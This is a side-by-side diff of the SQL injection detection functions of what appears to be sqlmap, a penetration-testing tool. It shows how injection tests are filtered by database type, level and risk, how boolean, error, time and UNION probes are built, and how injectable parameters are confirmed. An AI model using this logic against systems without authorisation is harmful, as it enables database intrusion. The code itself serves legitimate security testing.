if not Backend.getIdentifiedDbms() and kb.heuristicDbms is False:
|
||||||
kb.heuristicDbms = heuristicCheckDbms(injection) or UNKNOWN_DBMS
|
kb.heuristicDbms = heuristicCheckDbms(injection)
|
||||||
|
|
||||||
if not conf.testFilter and (Backend.getErrorParsedDBMSes() or kb.heuristicDbms) not in ([], None, UNKNOWN_DBMS):
|
# If the DBMS has already been fingerprinted (via DBMS-specific
|
||||||
if kb.reduceTests is None and Backend.getErrorParsedDBMSes():
|
# error message, simple heuristic check or via DBMS-specific
|
||||||
msg = "heuristic (parsing) test showed that the "
|
# payload), ask the user to limit the tests to the fingerprinted
|
||||||
msg += "back-end DBMS could be '%s'. " % (Format.getErrorParsedDBMSes() if Backend.getErrorParsedDBMSes() else kb.heuristicDbms)
|
# DBMS
|
||||||
msg += "Do you want to skip test payloads specific for other DBMSes? [Y/n]"
|
if kb.reduceTests is None and not conf.testFilter and (intersect(Backend.getErrorParsedDBMSes(), \
|
||||||
kb.reduceTests = [] if readInput(msg, default='Y').upper() != 'Y' else (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms])
|
SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms):
|
||||||
|
msg = "it looks like the back-end DBMS is '%s'. " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms)
|
||||||
|
msg += "Do you want to skip test payloads specific for other DBMSes? [Y/n]"
|
||||||
|
kb.reduceTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y').upper() == 'Y' else []
|
||||||
|
|
||||||
if kb.extendTests is None:
|
# If the DBMS has been fingerprinted (via DBMS-specific error
|
||||||
_ = (Format.getErrorParsedDBMSes() if Backend.getErrorParsedDBMSes() else kb.heuristicDbms)
|
# message, via simple heuristic check or via DBMS-specific
|
||||||
msg = "do you want to include all tests for '%s' " % _
|
# payload), ask the user to extend the tests to all DBMS-specific,
|
||||||
msg += "extending provided level (%d) and risk (%s)? [Y/n]" % (conf.level, conf.risk)
|
# regardless of --level and --risk values provided
|
||||||
kb.extendTests = [] if readInput(msg, default='Y').upper() != 'Y' else (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms])
|
if kb.extendTests is None and not conf.testFilter and (conf.level < 5 or conf.risk < 3) \
|
||||||
|
and (intersect(Backend.getErrorParsedDBMSes(), SUPPORTED_DBMS, True) or \
|
||||||
|
kb.heuristicDbms or injection.dbms):
|
||||||
|
msg = "for the remaining tests, do you want to include all tests "
|
||||||
|
msg += "for '%s' extending provided " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms)
|
||||||
|
msg += "level (%d)" % conf.level if conf.level < 5 else ""
|
||||||
|
msg += " and " if conf.level < 5 and conf.risk < 3 else ""
|
||||||
|
msg += "risk (%d)" % conf.risk if conf.risk < 3 else ""
|
||||||
|
msg += " values? [Y/n]" if conf.level < 5 and conf.risk < 3 else " value? [Y/n]"
|
||||||
|
kb.extendTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y').upper() == 'Y' else []
|
||||||
|
|
||||||
title = test.title
|
title = test.title
|
||||||
stype = test.stype
|
kb.testType = stype = test.stype
|
||||||
clause = test.clause
|
clause = test.clause
|
||||||
unionExtended = False
|
unionExtended = False
|
||||||
|
|
||||||
|
@ -163,27 +190,56 @@ def checkSqlInjection(place, parameter, value):
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
continue
|
continue
|
||||||
|
|
||||||
|
# Parse DBMS-specific payloads' details
|
||||||
# Skip DBMS-specific test if it does not match either the
|
|
||||||
# previously identified or the user's provided DBMS (either
|
|
||||||
# from program switch or from parsed error message(s))
|
|
||||||
if "details" in test and "dbms" in test.details:
|
if "details" in test and "dbms" in test.details:
|
||||||
dbms = test.details.dbms
|
payloadDbms = test.details.dbms
|
||||||
else:
|
else:
|
||||||
dbms = None
|
payloadDbms = None
|
||||||
|
|
||||||
# Skip tests if title is not included by the given filter
|
# Skip tests if title, vector or DBMS is not included by the
|
||||||
if conf.testFilter:
|
# given test filter
|
||||||
if not any(re.search(conf.testFilter, str(item), re.I) for item in (test.title, test.vector, dbms)):
|
if conf.testFilter and not any(conf.testFilter in str(item) or \
|
||||||
debugMsg = "skipping test '%s' because " % title
|
re.search(conf.testFilter, str(item), re.I) for item in \
|
||||||
debugMsg += "its name/vector/dbms is not included by the given filter"
|
(test.title, test.vector, payloadDbms)):
|
||||||
|
debugMsg = "skipping test '%s' because its " % title
|
||||||
|
debugMsg += "name/vector/DBMS is not included by the given filter"
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
continue
|
continue
|
||||||
|
|
||||||
elif not (kb.extendTests and intersect(dbms, kb.extendTests)):
|
if payloadDbms is not None:
|
||||||
|
# Skip DBMS-specific test if it does not match the user's
|
||||||
|
# provided DBMS
|
||||||
|
if conf.dbms is not None and not intersect(payloadDbms, conf.dbms, True):
|
||||||
|
debugMsg = "skipping test '%s' because " % title
|
||||||
|
debugMsg += "the provided DBMS is %s" % conf.dbms
|
||||||
|
logger.debug(debugMsg)
|
||||||
|
continue
|
||||||
|
|
||||||
|
# Skip DBMS-specific test if it does not match the
|
||||||
|
# previously identified DBMS (via DBMS-specific payload)
|
||||||
|
if injection.dbms is not None and not intersect(payloadDbms, injection.dbms, True):
|
||||||
|
debugMsg = "skipping test '%s' because the identified " % title
|
||||||
|
debugMsg += "back-end DBMS is %s" % injection.dbms
|
||||||
|
logger.debug(debugMsg)
|
||||||
|
continue
|
||||||
|
|
||||||
|
# Skip DBMS-specific test if it does not match the
|
||||||
|
# previously identified DBMS (via DBMS-specific error message)
|
||||||
|
if kb.reduceTests and not intersect(payloadDbms, kb.reduceTests, True):
|
||||||
|
debugMsg = "skipping test '%s' because the parsed " % title
|
||||||
|
debugMsg += "error message(s) showed that the back-end DBMS "
|
||||||
|
debugMsg += "could be %s" % Format.getErrorParsedDBMSes()
|
||||||
|
logger.debug(debugMsg)
|
||||||
|
continue
|
||||||
|
|
||||||
|
# If the user did not decide to extend the tests to all
|
||||||
|
# DBMS-specific or the test payloads is not specific to the
|
||||||
|
# identified DBMS, then only test for it if both level and risk
|
||||||
|
# are below the corrisponding configuration's level and risk
|
||||||
|
# values
|
||||||
|
if not conf.testFilter and not (kb.extendTests and intersect(payloadDbms, kb.extendTests, True)):
|
||||||
# Skip test if the risk is higher than the provided (or default)
|
# Skip test if the risk is higher than the provided (or default)
|
||||||
# value
|
# value
|
||||||
# Parse test's <risk>
|
|
||||||
if test.risk > conf.risk:
|
if test.risk > conf.risk:
|
||||||
debugMsg = "skipping test '%s' because the risk (%d) " % (title, test.risk)
|
debugMsg = "skipping test '%s' because the risk (%d) " % (title, test.risk)
|
||||||
debugMsg += "is higher than the provided (%d)" % conf.risk
|
debugMsg += "is higher than the provided (%d)" % conf.risk
|
||||||
|
@ -192,35 +248,12 @@ def checkSqlInjection(place, parameter, value):
|
||||||
|
|
||||||
# Skip test if the level is higher than the provided (or default)
|
# Skip test if the level is higher than the provided (or default)
|
||||||
# value
|
# value
|
||||||
# Parse test's <level>
|
|
||||||
if test.level > conf.level:
|
if test.level > conf.level:
|
||||||
debugMsg = "skipping test '%s' because the level (%d) " % (title, test.level)
|
debugMsg = "skipping test '%s' because the level (%d) " % (title, test.level)
|
||||||
debugMsg += "is higher than the provided (%d)" % conf.level
|
debugMsg += "is higher than the provided (%d)" % conf.level
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
continue
|
continue
|
||||||
|
|
||||||
if dbms is not None:
|
|
||||||
if injection.dbms is not None and not intersect(injection.dbms, dbms):
|
|
||||||
debugMsg = "skipping test '%s' because " % title
|
|
||||||
debugMsg += "the back-end DBMS identified is "
|
|
||||||
debugMsg += "%s" % injection.dbms
|
|
||||||
logger.debug(debugMsg)
|
|
||||||
continue
|
|
||||||
|
|
||||||
if conf.dbms is not None and not intersect(conf.dbms.lower(), [value.lower() for value in arrayizeValue(dbms)]):
|
|
||||||
debugMsg = "skipping test '%s' because " % title
|
|
||||||
debugMsg += "the provided DBMS is %s" % conf.dbms
|
|
||||||
logger.debug(debugMsg)
|
|
||||||
continue
|
|
||||||
|
|
||||||
if kb.reduceTests and not intersect(dbms, kb.reduceTests):
|
|
||||||
debugMsg = "skipping test '%s' because " % title
|
|
||||||
debugMsg += "the parsed error message(s) showed "
|
|
||||||
debugMsg += "that the back-end DBMS could be "
|
|
||||||
debugMsg += "%s" % Format.getErrorParsedDBMSes()
|
|
||||||
logger.debug(debugMsg)
|
|
||||||
continue
|
|
||||||
|
|
||||||
# Skip test if it does not match the same SQL injection clause
|
# Skip test if it does not match the same SQL injection clause
|
||||||
# already identified by another test
|
# already identified by another test
|
||||||
clauseMatch = False
|
clauseMatch = False
|
||||||
|
@ -232,11 +265,11 @@ def checkSqlInjection(place, parameter, value):
|
||||||
|
|
||||||
if clause != [0] and injection.clause and injection.clause != [0] and not clauseMatch:
|
if clause != [0] and injection.clause and injection.clause != [0] and not clauseMatch:
|
||||||
debugMsg = "skipping test '%s' because the clauses " % title
|
debugMsg = "skipping test '%s' because the clauses " % title
|
||||||
debugMsg += "differs from the clause already identified"
|
debugMsg += "differ from the clause already identified"
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
continue
|
continue
|
||||||
|
|
||||||
# Skip test if the user provided custom character
|
# Skip test if the user provided custom character (for UNION-based payloads)
|
||||||
if conf.uChar is not None and ("random number" in title or "(NULL)" in title):
|
if conf.uChar is not None and ("random number" in title or "(NULL)" in title):
|
||||||
debugMsg = "skipping test '%s' because the user " % title
|
debugMsg = "skipping test '%s' because the user " % title
|
||||||
debugMsg += "provided a specific character, %s" % conf.uChar
|
debugMsg += "provided a specific character, %s" % conf.uChar
|
||||||
|
@ -246,13 +279,13 @@ def checkSqlInjection(place, parameter, value):
|
||||||
infoMsg = "testing '%s'" % title
|
infoMsg = "testing '%s'" % title
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
# Force back-end DBMS according to the current
|
# Force back-end DBMS according to the current test DBMS value
|
||||||
# test value for proper payload unescaping
|
# for proper payload unescaping
|
||||||
Backend.forceDbms(dbms[0] if isinstance(dbms, list) else dbms)
|
Backend.forceDbms(payloadDbms[0] if isinstance(payloadDbms, list) else payloadDbms)
|
||||||
|
|
||||||
# Parse test's <request>
|
# Parse test's <request>
|
||||||
comment = agent.getComment(test.request) if len(conf.boundaries) > 1 else None
|
comment = agent.getComment(test.request) if len(conf.boundaries) > 1 else None
|
||||||
fstPayload = agent.cleanupPayload(test.request.payload, origValue=value)
|
fstPayload = agent.cleanupPayload(test.request.payload, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) else None)
|
||||||
|
|
||||||
# Favoring non-string specific boundaries in case of digit-like parameter values
|
# Favoring non-string specific boundaries in case of digit-like parameter values
|
||||||
if value.isdigit():
|
if value.isdigit():
|
||||||
|
@ -266,7 +299,7 @@ def checkSqlInjection(place, parameter, value):
|
||||||
# Skip boundary if the level is higher than the provided (or
|
# Skip boundary if the level is higher than the provided (or
|
||||||
# default) value
|
# default) value
|
||||||
# Parse boundary's <level>
|
# Parse boundary's <level>
|
||||||
if boundary.level > conf.level:
|
if boundary.level > conf.level and not (kb.extendTests and intersect(payloadDbms, kb.extendTests, True)):
|
||||||
continue
|
continue
|
||||||
|
|
||||||
# Skip boundary if it does not match against test's <clause>
|
# Skip boundary if it does not match against test's <clause>
|
||||||
|
@ -296,14 +329,13 @@ def checkSqlInjection(place, parameter, value):
|
||||||
# Parse boundary's <prefix>, <suffix> and <ptype>
|
# Parse boundary's <prefix>, <suffix> and <ptype>
|
||||||
prefix = boundary.prefix if boundary.prefix else ""
|
prefix = boundary.prefix if boundary.prefix else ""
|
||||||
suffix = boundary.suffix if boundary.suffix else ""
|
suffix = boundary.suffix if boundary.suffix else ""
|
||||||
|
ptype = boundary.ptype
|
||||||
|
|
||||||
# Options --prefix/--suffix have a higher priority (if set by user)
|
# Options --prefix/--suffix have a higher priority (if set by user)
|
||||||
prefix = conf.prefix if conf.prefix is not None else prefix
|
prefix = conf.prefix if conf.prefix is not None else prefix
|
||||||
suffix = conf.suffix if conf.suffix is not None else suffix
|
suffix = conf.suffix if conf.suffix is not None else suffix
|
||||||
comment = None if conf.suffix is not None else comment
|
comment = None if conf.suffix is not None else comment
|
||||||
|
|
||||||
ptype = boundary.ptype
|
|
||||||
|
|
||||||
# If the previous injections succeeded, we know which prefix,
|
# If the previous injections succeeded, we know which prefix,
|
||||||
# suffix and parameter type to use for further tests, no
|
# suffix and parameter type to use for further tests, no
|
||||||
# need to cycle through the boundaries for the following tests
|
# need to cycle through the boundaries for the following tests
|
||||||
|
@ -311,7 +343,9 @@ def checkSqlInjection(place, parameter, value):
|
||||||
condBound &= (injection.prefix != prefix or injection.suffix != suffix)
|
condBound &= (injection.prefix != prefix or injection.suffix != suffix)
|
||||||
condType = injection.ptype is not None and injection.ptype != ptype
|
condType = injection.ptype is not None and injection.ptype != ptype
|
||||||
|
|
||||||
if condBound or condType:
|
# If the payload is an inline query test for it regardless
|
||||||
|
# of previously identified injection types
|
||||||
|
if stype != PAYLOAD.TECHNIQUE.QUERY and (condBound or condType):
|
||||||
continue
|
continue
|
||||||
|
|
||||||
# For each test's <where>
|
# For each test's <where>
|
||||||
|
@ -321,20 +355,29 @@ def checkSqlInjection(place, parameter, value):
|
||||||
|
|
||||||
# Threat the parameter original value according to the
|
# Threat the parameter original value according to the
|
||||||
# test's <where> tag
|
# test's <where> tag
|
||||||
if where == PAYLOAD.WHERE.ORIGINAL:
|
if where == PAYLOAD.WHERE.ORIGINAL or conf.prefix:
|
||||||
origValue = value
|
origValue = value
|
||||||
|
|
||||||
|
if kb.tamperFunctions:
|
||||||
|
templatePayload = agent.payload(place, parameter, value="", newValue=origValue, where=where)
|
||||||
elif where == PAYLOAD.WHERE.NEGATIVE:
|
elif where == PAYLOAD.WHERE.NEGATIVE:
|
||||||
# Use different page template than the original
|
# Use different page template than the original
|
||||||
# one as we are changing parameters value, which
|
# one as we are changing parameters value, which
|
||||||
# will likely result in a different content
|
# will likely result in a different content
|
||||||
|
kb.data.setdefault("randomInt", str(randomInt(10)))
|
||||||
|
kb.data.setdefault("randomStr", str(randomStr(10)))
|
||||||
|
|
||||||
if conf.invalidLogical:
|
if conf.invalidLogical:
|
||||||
_ = randomInt(2)
|
_ = int(kb.data.randomInt[:2])
|
||||||
origValue = "%s AND %s=%s" % (value, _, _ + 1)
|
origValue = "%s AND %s=%s" % (value, _, _ + 1)
|
||||||
elif conf.invalidBignum:
|
elif conf.invalidBignum:
|
||||||
origValue = "%d.%d" % (randomInt(6), randomInt(1))
|
origValue = kb.data.randomInt[:6]
|
||||||
|
elif conf.invalidString:
|
||||||
|
origValue = kb.data.randomStr[:6]
|
||||||
else:
|
else:
|
||||||
origValue = "-%s" % randomInt()
|
origValue = "-%s" % kb.data.randomInt[:4]
|
||||||
templatePayload = agent.payload(place, parameter, newValue=origValue, where=where)
|
|
||||||
|
templatePayload = agent.payload(place, parameter, value="", newValue=origValue, where=where)
|
||||||
elif where == PAYLOAD.WHERE.REPLACE:
|
elif where == PAYLOAD.WHERE.REPLACE:
|
||||||
origValue = ""
|
origValue = ""
|
||||||
|
|
||||||
|
@ -351,13 +394,13 @@ def checkSqlInjection(place, parameter, value):
|
||||||
# payload was successful
|
# payload was successful
|
||||||
# Parse test's <response>
|
# Parse test's <response>
|
||||||
for method, check in test.response.items():
|
for method, check in test.response.items():
|
||||||
check = agent.cleanupPayload(check, origValue=value)
|
check = agent.cleanupPayload(check, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) else None)
|
||||||
|
|
||||||
# In case of boolean-based blind SQL injection
|
# In case of boolean-based blind SQL injection
|
||||||
if method == PAYLOAD.METHOD.COMPARISON:
|
if method == PAYLOAD.METHOD.COMPARISON:
|
||||||
# Generate payload used for comparison
|
# Generate payload used for comparison
|
||||||
def genCmpPayload():
|
def genCmpPayload():
|
||||||
sndPayload = agent.cleanupPayload(test.response.comparison, origValue=value)
|
sndPayload = agent.cleanupPayload(test.response.comparison, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) else None)
|
||||||
|
|
||||||
# Forge response payload by prepending with
|
# Forge response payload by prepending with
|
||||||
# boundary's prefix and appending the boundary's
|
# boundary's prefix and appending the boundary's
|
||||||
|
@ -385,7 +428,7 @@ def checkSqlInjection(place, parameter, value):
|
||||||
|
|
||||||
# Perform the test's False request
|
# Perform the test's False request
|
||||||
if not falseResult:
|
if not falseResult:
|
||||||
infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title)
|
infoMsg = "%s parameter '%s' seems to be '%s' injectable " % (paramType, parameter, title)
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
injectable = True
|
injectable = True
|
||||||
|
@ -394,9 +437,10 @@ def checkSqlInjection(place, parameter, value):
|
||||||
trueSet = set(extractTextTagContent(truePage))
|
trueSet = set(extractTextTagContent(truePage))
|
||||||
falseSet = set(extractTextTagContent(falsePage))
|
falseSet = set(extractTextTagContent(falsePage))
|
||||||
candidates = filter(None, (_.strip() if _.strip() in (kb.pageTemplate or "") and _.strip() not in falsePage and _.strip() not in threadData.lastComparisonHeaders else None for _ in (trueSet - falseSet)))
|
candidates = filter(None, (_.strip() if _.strip() in (kb.pageTemplate or "") and _.strip() not in falsePage and _.strip() not in threadData.lastComparisonHeaders else None for _ in (trueSet - falseSet)))
|
||||||
|
|
||||||
if candidates:
|
if candidates:
|
||||||
conf.string = candidates[0]
|
conf.string = candidates[0]
|
||||||
infoMsg = "%s parameter '%s' seems to be '%s' injectable (with --string=\"%s\")" % (place, parameter, title, repr(conf.string).lstrip('u').strip("'"))
|
infoMsg = "%s parameter '%s' seems to be '%s' injectable (with --string=\"%s\")" % (paramType, parameter, title, repr(conf.string).lstrip('u').strip("'"))
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
injectable = True
|
injectable = True
|
||||||
|
@ -408,7 +452,8 @@ def checkSqlInjection(place, parameter, value):
|
||||||
try:
|
try:
|
||||||
page, headers = Request.queryPage(reqPayload, place, content=True, raise404=False)
|
page, headers = Request.queryPage(reqPayload, place, content=True, raise404=False)
|
||||||
output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE) \
|
output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE) \
|
||||||
or extractRegexResult(check, listToStrValue(headers.headers \
|
or extractRegexResult(check, listToStrValue( \
|
||||||
|
[headers[key] for key in headers.keys() if key.lower() != URI_HTTP_HEADER.lower()] \
|
||||||
if headers else None), re.DOTALL | re.IGNORECASE) \
|
if headers else None), re.DOTALL | re.IGNORECASE) \
|
||||||
or extractRegexResult(check, threadData.lastRedirectMsg[1] \
|
or extractRegexResult(check, threadData.lastRedirectMsg[1] \
|
||||||
if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == \
|
if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == \
|
||||||
|
@ -418,13 +463,13 @@ def checkSqlInjection(place, parameter, value):
|
||||||
result = output == "1"
|
result = output == "1"
|
||||||
|
|
||||||
if result:
|
if result:
|
||||||
infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title)
|
infoMsg = "%s parameter '%s' is '%s' injectable " % (paramType, parameter, title)
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
injectable = True
|
injectable = True
|
||||||
|
|
||||||
except SqlmapConnectionException, msg:
|
except SqlmapConnectionException, msg:
|
||||||
debugMsg = "problem occured most likely because the "
|
debugMsg = "problem occurred most likely because the "
|
||||||
debugMsg += "server hasn't recovered as expected from the "
|
debugMsg += "server hasn't recovered as expected from the "
|
||||||
debugMsg += "error-based payload used ('%s')" % msg
|
debugMsg += "error-based payload used ('%s')" % msg
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
|
@ -440,7 +485,7 @@ def checkSqlInjection(place, parameter, value):
|
||||||
trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False)
|
trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False)
|
||||||
|
|
||||||
if trueResult:
|
if trueResult:
|
||||||
infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title)
|
infoMsg = "%s parameter '%s' seems to be '%s' injectable " % (paramType, parameter, title)
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
injectable = True
|
injectable = True
|
||||||
|
@ -456,7 +501,7 @@ def checkSqlInjection(place, parameter, value):
|
||||||
configUnion(test.request.char, test.request.columns)
|
configUnion(test.request.char, test.request.columns)
|
||||||
|
|
||||||
if not Backend.getIdentifiedDbms():
|
if not Backend.getIdentifiedDbms():
|
||||||
if kb.heuristicDbms in (None, UNKNOWN_DBMS):
|
if kb.heuristicDbms is None:
|
||||||
warnMsg = "using unescaped version of the test "
|
warnMsg = "using unescaped version of the test "
|
||||||
warnMsg += "because of zero knowledge of the "
|
warnMsg += "because of zero knowledge of the "
|
||||||
warnMsg += "back-end DBMS. You can try to "
|
warnMsg += "back-end DBMS. You can try to "
|
||||||
|
@ -466,17 +511,17 @@ def checkSqlInjection(place, parameter, value):
|
||||||
Backend.forceDbms(kb.heuristicDbms)
|
Backend.forceDbms(kb.heuristicDbms)
|
||||||
|
|
||||||
if unionExtended:
|
if unionExtended:
|
||||||
infoMsg = "automatically extending ranges "
|
infoMsg = "automatically extending ranges for UNION "
|
||||||
infoMsg += "for UNION query injection technique tests as "
|
infoMsg += "query injection technique tests as "
|
||||||
infoMsg += "there is at least one other potential "
|
infoMsg += "there is at least one other (potential) "
|
||||||
infoMsg += "injection technique found"
|
infoMsg += "technique found"
|
||||||
singleTimeLogMessage(infoMsg)
|
singleTimeLogMessage(infoMsg)
|
||||||
|
|
||||||
# Test for UNION query SQL injection
|
# Test for UNION query SQL injection
|
||||||
reqPayload, vector = unionTest(comment, place, parameter, value, prefix, suffix)
|
reqPayload, vector = unionTest(comment, place, parameter, value, prefix, suffix)
|
||||||
|
|
||||||
if isinstance(reqPayload, basestring):
|
if isinstance(reqPayload, basestring):
|
||||||
infoMsg = "%s parameter '%s' is '%s' injectable" % (place, parameter, title)
|
infoMsg = "%s parameter '%s' is '%s' injectable" % (paramType, parameter, title)
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
injectable = True
|
injectable = True
|
||||||
|
@ -487,6 +532,9 @@ def checkSqlInjection(place, parameter, value):
|
||||||
|
|
||||||
kb.previousMethod = method
|
kb.previousMethod = method
|
||||||
|
|
||||||
|
if conf.dummy:
|
||||||
|
injectable = False
|
||||||
|
|
||||||
# If the injection test was successful feed the injection
|
# If the injection test was successful feed the injection
|
||||||
# object with the test's details
|
# object with the test's details
|
||||||
if injectable is True:
|
if injectable is True:
|
||||||
|
@ -509,12 +557,15 @@ def checkSqlInjection(place, parameter, value):
|
||||||
for dKey, dValue in test.details.items():
|
for dKey, dValue in test.details.items():
|
||||||
if dKey == "dbms":
|
if dKey == "dbms":
|
||||||
injection.dbms = dValue
|
injection.dbms = dValue
|
||||||
|
|
||||||
if not isinstance(dValue, list):
|
if not isinstance(dValue, list):
|
||||||
Backend.setDbms(dValue)
|
Backend.setDbms(dValue)
|
||||||
else:
|
else:
|
||||||
Backend.forceDbms(dValue[0], True)
|
Backend.forceDbms(dValue[0], True)
|
||||||
|
|
||||||
elif dKey == "dbms_version" and injection.dbms_version is None and not conf.testFilter:
|
elif dKey == "dbms_version" and injection.dbms_version is None and not conf.testFilter:
|
||||||
injection.dbms_version = Backend.setVersion(dValue)
|
injection.dbms_version = Backend.setVersion(dValue)
|
||||||
|
|
||||||
elif dKey == "os" and injection.os is None:
|
elif dKey == "os" and injection.os is None:
|
||||||
injection.os = Backend.setOs(dValue)
|
injection.os = Backend.setOs(dValue)
|
||||||
|
|
||||||
|
@ -565,11 +616,21 @@ def checkSqlInjection(place, parameter, value):
|
||||||
warnMsg = "user aborted during detection phase"
|
warnMsg = "user aborted during detection phase"
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
msg = "how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(q)uit]"
|
msg = "how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]"
|
||||||
choice = readInput(msg, default="S", checkBatch=False)
|
choice = readInput(msg, default="S", checkBatch=False)
|
||||||
|
|
||||||
if choice[0] in ("s", "S"):
|
if choice[0] in ("s", "S"):
|
||||||
pass
|
pass
|
||||||
|
elif choice[0] in ("c", "C"):
|
||||||
|
choice = None
|
||||||
|
while not ((choice or "").isdigit() and 0 <= int(choice) <= 6):
|
||||||
|
if choice:
|
||||||
|
logger.warn("invalid value")
|
||||||
|
msg = "enter new verbosity level: [0-6] "
|
||||||
|
choice = readInput(msg, default=str(conf.verbose), checkBatch=False).strip()
|
||||||
|
conf.verbose = int(choice)
|
||||||
|
setVerbosity()
|
||||||
|
tests.insert(0, test)
|
||||||
elif choice[0] in ("n", "N"):
|
elif choice[0] in ("n", "N"):
|
||||||
return None
|
return None
|
||||||
elif choice[0] in ("e", "E"):
|
elif choice[0] in ("e", "E"):
|
||||||
|
@ -592,22 +653,35 @@ def checkSqlInjection(place, parameter, value):
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
injection = checkFalsePositives(injection)
|
injection = checkFalsePositives(injection)
|
||||||
|
|
||||||
|
if not injection:
|
||||||
|
kb.vulnHosts.remove(conf.hostname)
|
||||||
else:
|
else:
|
||||||
injection = None
|
injection = None
|
||||||
|
|
||||||
if injection:
|
if injection:
|
||||||
checkSuhosinPatch(injection)
|
checkSuhosinPatch(injection)
|
||||||
|
checkFilteredChars(injection)
|
||||||
|
|
||||||
return injection
|
return injection
|
||||||
|
|
||||||
def heuristicCheckDbms(injection):
|
def heuristicCheckDbms(injection):
|
||||||
retVal = None
|
"""
|
||||||
|
This functions is called when boolean-based blind is identified with a
|
||||||
|
generic payload and the DBMS has not yet been fingerprinted to attempt
|
||||||
|
to identify with a simple DBMS specific boolean-based test what the DBMS
|
||||||
|
may be
|
||||||
|
"""
|
||||||
|
retVal = False
|
||||||
|
|
||||||
pushValue(kb.injection)
|
pushValue(kb.injection)
|
||||||
kb.injection = injection
|
kb.injection = injection
|
||||||
randStr1, randStr2 = randomStr(), randomStr()
|
|
||||||
|
|
||||||
for dbms in getPublicTypeMembers(DBMS, True):
|
for dbms in getPublicTypeMembers(DBMS, True):
|
||||||
|
if not FROM_DUMMY_TABLE.get(dbms, ""):
|
||||||
|
continue
|
||||||
|
|
||||||
|
randStr1, randStr2 = randomStr(), randomStr()
|
||||||
Backend.forceDbms(dbms)
|
Backend.forceDbms(dbms)
|
||||||
|
|
||||||
if checkBooleanExpression("(SELECT '%s'%s)='%s'" % (randStr1, FROM_DUMMY_TABLE.get(dbms, ""), randStr1)):
|
if checkBooleanExpression("(SELECT '%s'%s)='%s'" % (randStr1, FROM_DUMMY_TABLE.get(dbms, ""), randStr1)):
|
||||||
|
@ -619,7 +693,7 @@ def heuristicCheckDbms(injection):
|
||||||
kb.injection = popValue()
|
kb.injection = popValue()
|
||||||
|
|
||||||
if retVal:
|
if retVal:
|
||||||
infoMsg = "heuristic (extended) test shows that the back-end DBMS " # not as important as "parsing" counter-part (because of false-positives)
|
infoMsg = "heuristic (extended) test shows that the back-end DBMS " # Not as important as "parsing" counter-part (because of false-positives)
|
||||||
infoMsg += "could be '%s' " % retVal
|
infoMsg += "could be '%s' " % retVal
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
|
@ -632,9 +706,7 @@ def checkFalsePositives(injection):
|
||||||
|
|
||||||
retVal = injection
|
retVal = injection
|
||||||
|
|
||||||
if len(injection.data) == 1 and any(map(lambda x: x in injection.data, [PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED]))\
|
if all(_ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in injection.data):
|
||||||
or len(injection.data) == 2 and all(map(lambda x: x in injection.data, [PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED])):
|
|
||||||
# or len(injection.data) == 1 and 'Generic' in injection.data.values()[0].title and not Backend.getIdentifiedDbms():
|
|
||||||
pushValue(kb.injection)
|
pushValue(kb.injection)
|
||||||
|
|
||||||
infoMsg = "checking if the injection point on %s " % injection.place
|
infoMsg = "checking if the injection point on %s " % injection.place
|
||||||
|
@ -646,19 +718,15 @@ def checkFalsePositives(injection):
|
||||||
|
|
||||||
kb.injection = injection
|
kb.injection = injection
|
||||||
|
|
||||||
# Simple arithmetic operations which should show basic
|
for i in xrange(conf.level):
|
||||||
# arithmetic ability of the backend if it's really injectable
|
while True:
|
||||||
for i in xrange(1 + conf.level / 2):
|
randInt1, randInt2, randInt3 = (_() for j in xrange(3))
|
||||||
randInt1, randInt2, randInt3 = (_() for j in xrange(3))
|
|
||||||
|
|
||||||
randInt1 = min(randInt1, randInt2, randInt3)
|
randInt1 = min(randInt1, randInt2, randInt3)
|
||||||
randInt3 = max(randInt1, randInt2, randInt3)
|
